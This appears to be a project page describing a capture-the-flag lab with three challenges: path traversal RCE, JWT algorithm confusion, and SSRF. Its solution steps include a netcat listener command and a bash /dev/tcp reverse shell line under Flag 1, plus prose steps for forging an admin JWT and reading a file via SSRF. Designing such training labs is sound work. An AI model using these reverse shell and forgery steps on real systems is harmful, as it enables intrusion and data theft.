SecurityCTF

CTF challenges for critical vulnerability exploits

Spring 2025, Heidelberg

Task: Design CTF-challenges for multiple common vulnerabilities in real-world environments.

Project Idea

(1) Login / register system to Secure Dashboard
(2) Personal Secure Dashboard

Architecture Draft

Vulnerabilities

Flag 1: Path Traversal Attack

CVE-2021-41773

Create Account, despite disabled.

 

Recommended Solution

1. Open reverse shell

Listen on port 444 via netcat: nclnvnp 4444

2. Execute RCE

/bin/bash –i >& /dev/tcp/<IP of the listener>/4444 0>&1

3. Send request to auth-server

Check registration request via browser.

Send modification from web-server to hostname “auth-server” with port 5000.

Reach RCE via CGI scripts already activated on web-server.

Flag 2: JWT Algorithm Confusion

CVE-2022-29217

Gain admin privileges via scope elevation.

 

Recommended Solution

1. Extract JWT from Secure Dashboard

After login, browser stores JWT cookies. Extract those via dev tools.

2. Retrieve Public Key

Public key is accessible on /.well-known/jwks.json

Convert into OpenSSH format.

3. Modify and Re-sign JWT

Use Algorithm Confusion Attack: Use public key as HMAC-key, sign new JWT with scope=admin.

Flag 3: Server-Side Request Forgery

CVE-2021-3129

Retrieve flag from internal network.

 

Recommended Solution

1. Explore Admin Dashboard

Use admin priviledge to access monitoring API.

– http://monitoring-server:9000/health

– http://monitoring-server:9000/metrics

2. Perform SSRF Attack

Run internal request via SSRF on file://home/admin/flag.txt

Retrieve final flag by loading flag.txt from system.

Highly esteemed friend involved in this project

Hannes Diedrichsen

Associated Ressources

Documentation